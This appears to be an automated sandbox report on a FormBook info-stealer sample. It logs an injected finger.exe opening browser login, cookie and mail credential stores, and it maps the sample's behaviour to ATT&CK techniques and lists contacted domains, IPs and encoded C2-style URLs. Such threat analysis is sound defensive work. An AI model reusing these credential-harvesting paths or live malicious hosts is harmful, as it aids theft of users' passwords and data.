                Source: Yara matchFile source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection
                NTDS2
                File and Directory Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets113
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567386 Sample: 72STaC6BmljfbIQ.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 35 www.pbfgm.xyz 2->35 37 www.smalleyes.icu 2->37 39 6 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 55 5 other signatures 2->55 10 72STaC6BmljfbIQ.exe 3 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\user\...\72STaC6BmljfbIQ.exe.log, ASCII 10->33 dropped 67 Injects a PE file into a foreign processes 10->67 14 72STaC6BmljfbIQ.exe 10->14         started        17 72STaC6BmljfbIQ.exe 10->17         started        19 72STaC6BmljfbIQ.exe 10->19         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 21 PWhloTdOLAusO.exe 14->21 injected process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 21->57 24 finger.exe 13 21->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 PWhloTdOLAusO.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.btblxhh.top 156.234.28.101, 49726, 49727, 49728 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 27->41 43 www.primespot.live 209.74.79.42, 49730, 49731, 49732 MULTIBAND-NEWHOPEUS United States 27->43 45 6 other IPs or domains 27->45 69 Found direct / indirect Syscall (likely to bypass EDR) 27->69 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                72STaC6BmljfbIQ.exe58%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                72STaC6BmljfbIQ.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.graviton.energy/images/favicons/favicon-32x32.png0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/__media__/js/trademark.php?d=mohawktooldie.online&type=ns0%Avira URL Cloudsafe
                http://www.primespot.live/b8eq/?1JgHkl=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxDBcOFJwWRQ35vHrygTRMD3WsSY1KHoe5ieZg+FRRJHZJBA==&uZ9=wvL0WTq0tnld4P0%Avira URL Cloudsafe
                http://www.graviton.energy/../images/bg-landing-page.jpg0%Avira URL Cloudsafe
                http://www.Mohawktooldie.online0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/Mohawk_Hairstyles.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFO0%Avira URL Cloudsafe
                http://elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/__media__/design/underconstructionnotice.php?d=mohawktooldie.online0%Avira URL Cloudsafe
                http://www.phdcoach.pro/izsd/0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/browserconfig.xml0%Avira URL Cloudsafe
                http://www.primespot.live/b8eq/0%Avira URL Cloudsafe
                http://www.smalleyes.icu/s6zh/0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/display.cfm0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/Organic_Hair_Products.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR60%Avira URL Cloudsafe
                https://www.hosttech.ch0%Avira URL Cloudsafe
                http://www.pbfgm.xyz/fjd6/?uZ9=wvL0WTq0tnld4P&1JgHkl=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2HRrufKZisD26p6RGVEvaASN7Xi+5siy6qQN86qnR0uMGQ==0%Avira URL Cloudsafe
                https://00808.vip/100%Avira URL Cloudmalware
                http://www.graviton.energy0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/Mohawk_Carpet.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFOCXOm0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/manifest.json0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/favicon.ico0%Avira URL Cloudsafe
                http://www.elinor.club/1ne4/0%Avira URL Cloudsafe
                http://www.graviton.energy/images/logo-hosttech.svg0%Avira URL Cloudsafe
                http://www.phdcoach.pro/izsd/?1JgHkl=xn6+B8LDUgeEZE/ewkyW9IYT/XMT7FP3Y1kTMJZ4lyb9girANxKziqifoVXMiOJsh7TOAwS+CRcOnA4ABGuIrM8s5EZR8uZbFlAOcv1SbgYYGS8/Ve3tsCmgzp0y8eq9Cg==&uZ9=wvL0WTq0tnld4P0%Avira URL Cloudsafe
                http://www.graviton.energy/css/app.css0%Avira URL Cloudsafe
                http://www.btblxhh.top/dp9c/0%Avira URL Cloudsafe
                http://www.graviton.energy/y54z/?1JgHkl=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2ZPd0sXm+50uRZ80dRU59tTW2JoKfzEPgRpmu9XiZqkNmHw==&uZ9=wvL0WTq0tnld4P0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/safari-pinned-tab.svg0%Avira URL Cloudsafe
                http://www.graviton.energy/y54z/0%Avira URL Cloudsafe
                http://www.elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5hRbnJSY7Fzwy0niAuWJ/cwCJWSeGkVgu4T1N3P5ck3FVA==0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/favicon-16x16.png0%Avira URL Cloudsafe
                http://www.smalleyes.icu/s6zh/?1JgHkl=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMIJvPVmvlNwG1HEhIOCZ2tdwLUOtnvozCQbX7z6vra7jTg==&uZ9=wvL0WTq0tnld4P0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/e1ut/?uZ9=wvL0WTq0tnld4P&1JgHkl=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iq978UInban7m5bgNeGe1Bvvfx4xUX/Ch8llqthzcuqNnDWQ==0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/apple-touch-icon.png0%Avira URL Cloudsafe
                http://www.graviton.energy/js/app.js0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/e1ut/0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/Best_Hair_Straighteners.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7Sb0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/Coconut_Oil_for_Hair_Growth.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2B0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.mohawktooldie.online
                208.91.197.27
                truetrue
                  unknown
                  www.phdcoach.pro
                  178.172.160.30
                  truetrue
                    unknown
                    www.smalleyes.icu
                    134.122.191.187
                    truetrue
                      unknown
                      www.pbfgm.xyz
                      172.67.218.146
                      truetrue
                        unknown
                        www.elinor.club
                        194.58.112.174
                        truetrue
                          unknown
                          www.primespot.live
                          209.74.79.42
                          truetrue
                            unknown
                            www.btblxhh.top
                            156.234.28.101
                            truetrue
                              unknown
                              www.graviton.energy
                              185.101.158.113
                              truetrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://www.primespot.live/b8eq/?1JgHkl=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxDBcOFJwWRQ35vHrygTRMD3WsSY1KHoe5ieZg+FRRJHZJBA==&uZ9=wvL0WTq0tnld4Ptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.phdcoach.pro/izsd/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.primespot.live/b8eq/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.pbfgm.xyz/fjd6/?uZ9=wvL0WTq0tnld4P&1JgHkl=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2HRrufKZisD26p6RGVEvaASN7Xi+5siy6qQN86qnR0uMGQ==true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.smalleyes.icu/s6zh/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.elinor.club/1ne4/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.btblxhh.top/dp9c/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5hRbnJSY7Fzwy0niAuWJ/cwCJWSeGkVgu4T1N3P5ck3FVA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.phdcoach.pro/izsd/?1JgHkl=xn6+B8LDUgeEZE/ewkyW9IYT/XMT7FP3Y1kTMJZ4lyb9girANxKziqifoVXMiOJsh7TOAwS+CRcOnA4ABGuIrM8s5EZR8uZbFlAOcv1SbgYYGS8/Ve3tsCmgzp0y8eq9Cg==&uZ9=wvL0WTq0tnld4Ptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.graviton.energy/y54z/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.graviton.energy/y54z/?1JgHkl=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2ZPd0sXm+50uRZ80dRU59tTW2JoKfzEPgRpmu9XiZqkNmHw==&uZ9=wvL0WTq0tnld4Ptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.smalleyes.icu/s6zh/?1JgHkl=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMIJvPVmvlNwG1HEhIOCZ2tdwLUOtnvozCQbX7z6vra7jTg==&uZ9=wvL0WTq0tnld4Ptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.mohawktooldie.online/e1ut/?uZ9=wvL0WTq0tnld4P&1JgHkl=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iq978UInban7m5bgNeGe1Bvvfx4xUX/Ch8llqthzcuqNnDWQ==true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.mohawktooldie.online/e1ut/true
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabfinger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dts.gnpge.comPWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                        high
                                        http://www.graviton.energy/images/favicons/browserconfig.xmlfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.graviton.energy/images/favicons/favicon-32x32.pngfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdn.consentmanager.netfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                          high
                                          http://www.mohawktooldie.online/__media__/design/underconstructionnotice.php?d=mohawktooldie.onlinefinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                            high
                                            http://www.mohawktooldie.online/Mohawk_Hairstyles.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFOfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFFfinger.exe, 00000008.00000002.3271932261.0000000003D28000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000002EA8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.Mohawktooldie.onlinefinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mohawktooldie.online/__media__/js/trademark.php?d=mohawktooldie.online&type=nsfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.graviton.energy/../images/bg-landing-page.jpgfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://i4.cdn-image.com/__media__/pics/29590/bg1.png)finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                high
                                                http://www.mohawktooldie.online/display.cfmfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.hosttech.chPWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  high
                                                  http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfinger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        high
                                                        http://www.mohawktooldie.online/Mohawk_Carpet.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFOCXOmfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mohawktooldie.online/Organic_Hair_Products.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://i4.cdn-image.com/__media__/pics/28903/search.png)finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            https://00808.vip/finger.exe, 00000008.00000002.3271932261.000000000404C000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000031CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://delivery.consentmanager.netfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                http://www.graviton.energy/images/favicons/manifest.jsonfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.graviton.energyPWhloTdOLAusO.exe, 0000000B.00000002.3270119796.000000000088F000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icofinger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.graviton.energy/images/logo-hosttech.svgfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.graviton.energy/css/app.cssfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.graviton.energy/images/favicons/favicon.icofinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
